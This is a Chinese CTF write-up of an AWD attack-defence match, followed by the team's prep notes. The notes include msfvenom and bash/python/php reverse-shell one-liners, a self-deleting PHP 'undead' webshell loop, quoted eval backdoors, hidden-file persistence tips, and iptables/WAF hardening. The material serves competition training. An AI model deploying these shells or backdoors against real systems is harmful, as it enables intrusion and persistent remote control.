打了一场线下市赛,为awd模式,每个队伍两台靶机防守,一台web1是typecho,一台web2是YznCMSV1.0,前期准备是两个防守,一个攻击,当进入比赛时,环境出了问题,我这个攻击选手进不去,加固时间都已经过了,我赶紧连上去以后下载源码,D盾一扫发现几个木马,1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24c:\users\iloveflag\desktop\172.20.131.102\application\pay\controller\api.php
public function alipay_callback() {
$param = $this->request->request('param');
eval($param);
c:\users\iloveflag\desktop\172.20.131.102\application\pay\library\service.php
try {
$pay = Pay::$type(self::getConfig($type));
$get = request()->get('', null, 'trim');
//去除空值
$get = array_filter($get, create_function('$v', 'return !empty($v);'));
$data = $type == 'wechat' ? file_get_contents("php://input") : $get;
$data = $pay->verify($data);
if ($data) {
return $pay;
}
} catch (Exception $e) {
return false;
}
return false;
}
然后删除,后面我看其他队伍都上了waf,我们也上了awd-watchbird-master这款waf,web2上了waf后直接主页上不去了,web1前期没有发现漏洞,只能先上waf扛着,暂时页面正常,我一发现web2down掉以后,直接删除了web目录,开始还原,但是页面可以访问,但是主页直接不行了,后面一直checkdown裁判一直扣分,赛后和其他队伍交流后说还原无效的,web2有个小bug,要自己修日志文件?我木掉了。反正web2已经checkdown了,索性上了waf,防止其他队伍找到bug拿flag,然后转向web1,到了下午的时候,发现队伍一直扣flag分,怀疑web1被下了不死马,因为前期web1上过waf,日志发现有个队伍从index.php/api/alipay_callback连接入侵,但是我一开始以为alipay是web2的漏洞,对手在全局扫描,后面看到不死马发现不对,但是全局搜索alipay没有发现这个api,只能删除了整个web目录,然后还原,发现对方又在public,目录下了一个.blue3.php的不死马,我只能再次还原,然后新建一个.blue3.php的文件,权限111,后面发现一个skyexp.php,对方一直在和我纠缠,而且通过日志知道对方将web权限维持到了他的8080端口,linux服务器这边w发现他一直在,但是可恶的是我这边不是root权限,是ctf用户,也重启不了nginx,kill也踢不出对方www-data用户的权限维持,这就造成比赛体验极差,而且对方拿flag也就算了,直接将index目录下php文件全部删除,只有几个目录,我只能让另外的队友一直还原了,后面想到可以先给自己下马,web端进去就是www-data权限了,随后pkill -kill -t pts/0 踢用户,后续就是和对方不断地比手速,对方还从.1的ip换到.2的ip,不知道是不是两个队友一起上了,直到比赛结束,看了一下其他队伍web1也都是被这个队伍搞了,web1服务器直接挂了,web2一样页面访问错误checkdown扣分,后面一个队伍就是准备了几个靠谱的waf,没有扣分,排名也很靠前,第一次打awd。只能说前期准备不足,本人自己是去攻击的,到了现场全程在运维防守,队友web1上午也一直连接不上~前期准备的防火墙,改mysql之类的都没用上
前期的准备文档(其实没有什么软子用):1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43加waf:
find /var/www/html -name "*.php"|xargs sed -i "s#<?php#<?php\ninclude_once('/var/www/html/log.php');\n#g"
防火墙配置
linux:
msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=192.168.1.102 lport=8080 -f elf -o shell
use exploit/multi/handler
set payload linux/x86/meterpreter/reverse_tcp
防火墙:
显示当前开放的服务
[root@192 ~]# firewall-cmd --list-services
dhcpv6-client http https mysql ssh
firewall-cmd --add-service=mysql # 开放mysql端口
firewall-cmd --remove-service=http # 阻止http端口
firewall-cmd --list-services # 查看开放的服务
firewall-cmd --add-port=3306/tcp # 开放通过tcp访问3306
firewall-cmd --remove-port=80tcp # 阻止通过tcp访问3306
firewall-cmd --add-port=233/udp # 开放通过udp访问233
firewall-cmd --list-ports # 查看开放的端口
mysql禁止远程登录:
防火墙设置:firewall-cmd --remove-service=mysql
mysql数据库层面:
允许远程登录:
GRANT ALL PRIVILEGES ON *.* TO 'root'@'%' IDENTIFIED BY '123456' WITH GRANT OPTION;
FLUSH PRIVILEGES;
删除:
mysql_secure_installation
PHPCMS V9 \phpcms\base.php
PHPWIND8.7 \data\sql_config.php
DEDECMS5.7 \data\common.inc.php
DiscuzX2 \config\config_global.php
Wordpress \wp-config.php
Metinfo \include\head.php
删除不死马:
ps aux | grep www-data | awk '{print $2}' | xargs kill -9
awd简介与分工﴾全部要做﴿
服务器ssh等密码统一改为nbccserver95,webshell密码为
nbccshell95,mysql密码nbccmysql95
三人一组,两个攻击,一个防守
前期准备(30分钟)
将源码打包
tar ‐cvf html.tar ./
监听还原脚本‐>5分钟还原一次1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74# -*- encoding: utf-8 -*-
'''
@File : awd.py
@Time : 2020/08/09 20:44:54
@Author : iloveflag
@Version : 1.0
@Contact : iloveflag@outlook.com
@Desc : The Win32 port can only create tar archives,
but cannot pipe its output to other programs such as gzip or compress,
and will not create tar.gz archives; you will have to use or simulate a batch pipe.
BsdTar does have the ability to direcly create and manipulate .tar, .tar.gz, tar.bz2, .zip,
.gz and .bz2 archives, understands the most-used options of GNU Tar, and is also much faster;
for most purposes it is to be preferred to GNU Tar.
'''
import paramiko
import os
import time
def web_server_command(command,transport): #对服务器执行命令
ssh = paramiko.SSHClient()
ssh._transport = transport
stdin, stdout, stderr = ssh.exec_command(command)
# print(stdout.read())
def web_server_file_action(ip, port, user, passwd, action): #对服务器文件操作
try:
transport = paramiko.Transport(ip, int(port))
transport.connect(username=user, password=passwd)
sftp = paramiko.SFTP.from_transport(transport)
remote_path='/var/www/html/'
remote_file = 'html.tar'
local_path = 'C:/Users/'+os.getlogin()+'/Desktop/awd/'+ip+'/'
web_server_command('cd '+remote_path+' && tar -cvf '+remote_file+' ./',transport)
if not(os.path.exists(local_path)):
os.makedirs(local_path)
if action == 'get':
sftp.get(remote_path+remote_file,local_path+remote_file)
web_server_command('rm -rf '+remote_path+remote_file,transport)
print('服务器源码保存在'+local_path)
print('正在解压:')
os.system('cd '+local_path+' & tar -xvf '+remote_file+' &del '+remote_file)
print('文件解压完成')
else:
web_server_command('rm -rf '+remote_path+'*',transport)
print('清理服务器web目录')
os.system('cd '+local_path+' & tar -cvf '+remote_file+' ./*')
sftp.put(local_path+remote_file, remote_path+remote_file)
print('上传成功')
web_server_command('cd '+remote_path+'&& tar -xvf '+remote_file+' && rm -rf '+remote_file,transport)
print('还原完毕')
print('-----------------------------')
sftp.close()
except:
pass
print('download or upload error')
def web_server_mysql_action():
#web_server_mysql_action
pass
def web_server_status():
#web_server_status
pass
if __name__ == '__main__':
web1_server_ip='172.20.131.101'
web1_server_port='22'
web1_server_user='ctf'
web1_server_passwd='nbccserver95'
while(1):
for i in range(5,0,-1):
time.sleep(1)
print('倒计时'+str(i)+'秒')
web_server_file_action(web1_server_ip,web1_server_port,web1_server_user,web1_server_passwd, 'put')
vscode‐>ssh插件,实时在线编辑
5台linux服务器,非root用户
httpd‐>apache用户
nginx‐>wwdata用户
攻击:
环境
至少有一台linux的主机桥接
masscan ‐p80,22 192.168.0.1/24 ‐‐rate==1000
比nmap快
或者arp‐scan
代码审计
工具:D盾,seay源码审计,rip
一般会有最简单的eval后门,反序列化漏洞,命令执行
危险函数查找:eval,assert,system等
一些常见的cms通用漏洞
Metinfo 6.0.0 众多漏洞分析
找完以后告诉防守更改文件
默认密码批量扫描
拿到密码后先更改,然后用默认密码去批量登录其他的主机
后门隐藏
…目录
.shell.php
ls看不见
一句话反弹shell
bash1
bash ‐i >& /dev/tcp/192.168.0.103/8080 0>&1
python1
2
3python ‐c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.S
OCK_STREAM);s.connect(("192.168.31.41",8080));os.dup2(s.fileno(),0); os.dup2
(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","‐i"]);'
php1
2php ‐r '$sock=fsockopen("192.168.31.41",8080);exec("/bin/sh ‐i <&3 >&3 2>&
3");'
反弹的端口 192.168.10.234,则端口为8234,统一管理
不死马
php文件循环生成,建议放在…目录,文件名为.index.php1
2
3
4
5
6
7
8
9
10
11
12
13<?php
ignore_user_abort(true);
set_time_limit(0);
unlink(__FILE__);
$file = './.index.php';
$code = '<?php if(md5($_POST["pass"])=="3a50065e1709acc47ba0c9238294364f")
{@eval($_POST[a]);} ?>';
//pass=Sn3rtf4ck 马儿用法:fuckyou.php?pass=Sn3rtf4ck&a=command
while (1){
file_put_contents($file,$code);
usleep(5000);
}
?>
防守:
弱口令
大多是mysql,在php文件如config.php中可以看见信息
mysql更改密码:xxx
mysql禁止远程登录:xxx
防火墙配置
ubuntu‐ufw
centos7‐firewalld
centos6‐iptables
网上有awd配置防火墙的一键脚本
如:只允许团队的ip登录主机,只开放80,22端口1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46#!/bin/bash
#Allow youself Ping other hosts , prohibit others Ping you
iptables ‐A INPUT ‐p icmp ‐‐icmp‐type 8 ‐s 0/0 ‐j DROP
iptables ‐A OUTPUT ‐p icmp ‐‐icmp‐type 8 ‐s 0/0 ‐j ACCEPT
#Close all INPUT FORWARD OUTPUT, just open some ports
iptables ‐P INPUT DROP
iptables ‐P FORWARD DROP
iptables ‐P OUTPUT DROP
#Open ssh
iptables ‐A INPUT ‐p tcp ‐‐dport 22 ‐j ACCEPT
iptables ‐A OUTPUT ‐p tcp ‐‐sport 22 ‐j ACCEPT
#Open port 80
iptables ‐A INPUT ‐p tcp ‐‐dport 80 ‐j ACCEPT
iptables ‐A OUTPUT ‐p tcp ‐‐sport 80 ‐j ACCEPT
#Open multiport
#iptables ‐A INPUT ‐p tcp ‐m multiport ‐‐dport 22,80,8080,8081 ‐j ACCEPT
#Control IP connection
#The maximum number of connections for a single IP is 30
iptables ‐I INPUT ‐p tcp ‐‐dport 80 ‐m connlimit ‐‐connlimit‐above 30 ‐j RE
JECT
#A single IP allows up to 15 new connections in 60 seconds
iptables ‐A INPUT ‐p tcp ‐‐dport 80 ‐m recent ‐‐name BAD_HTTP_ACCESS ‐‐upda
te ‐‐seconds 60 ‐‐hitcount 15 ‐j REJECT
iptables ‐A INPUT ‐p tcp ‐‐dport 80 ‐m recent ‐‐name BAD_HTTP_ACCESS ‐‐set
‐j ACCEPT
#Prevent port reuse
iptables ‐A OUTPUT ‐p tcp ‐‐sport 22 ‐m state ‐‐state ESTABLISHED ‐j ACCEPT
iptables ‐A OUTPUT ‐p tcp ‐‐sport 80 ‐m state ‐‐state ESTABLISHED ‐j ACCEPT
iptables ‐A OUTPUT ‐p tcp ‐‐sport 443 ‐m state ‐‐state ESTABLISHED ‐j ACCEP
T
#Filter abnormal packets
iptables ‐A INPUT ‐i eth1 ‐p tcp ‐‐tcp‐flags SYN,RST,ACK,FIN SYN ‐j DROP
iptables ‐A INPUT ‐p tcp ‐‐tcp‐flags ALL FIN,URG,PSH ‐j DROP
iptables ‐A INPUT ‐p tcp ‐‐tcp‐flags ALL NONE ‐j DROP
iptables ‐A INPUT ‐p tcp ‐‐tcp‐flags ALL SYN,RST,ACK,FIN,URG ‐j DROP
iptables ‐A INPUT ‐p tcp ‐‐tcp‐flags ALL SYN,FIN,RST ‐j DROP
iptables ‐A INPUT ‐p tcp ‐‐tcp‐flags ALL SYN,FIN,PSH ‐j DROP
iptables ‐A INPUT ‐p tcp ‐‐tcp‐flags ALL SYN,FIN,RST,PSH ‐j DROP
iptables ‐A INPUT ‐p tcp ‐‐tcp‐flags SYN,RST SYN,RST ‐j DROP
iptables ‐A INPUT ‐p tcp ‐‐tcp‐flags SYN,FIN SYN,FIN ‐j DROP
#Prevent DoS attacks
iptables ‐A INPUT ‐p tcp ‐‐dport 80 ‐m limit ‐‐limit 20/minute ‐‐limit‐burs
t 100 ‐j ACCEPT
#Discard unfamiliar TCP response packs to prevent rebound attacks
iptables ‐A INPUT ‐m state ‐‐state NEW ‐p tcp ! ‐‐syn ‐j DROP
iptables ‐A FORWARD ‐m state ‐‐state NEW ‐p tcp ‐‐syn ‐j DROP
waf配置
上通防可能会被监测到,比赛加固30分钟完事后,开始比赛就上waf,每个php文件首行
require_once(‘waf.php’);,但是要注意不要影响正常的访问
如果一些熟悉的cms去配置文件更改,如include文件夹,默认每个文件都会include
waf去github搜
查看用户
w
踢出用户:xxx
不死马删除
利用bash脚本条件竞争的方式循环删除
一句话shell
查看端口状态netstat
ps ‐a
kill进程等
脚本
建议将文件保存在本地,5分钟还原一次服务器
```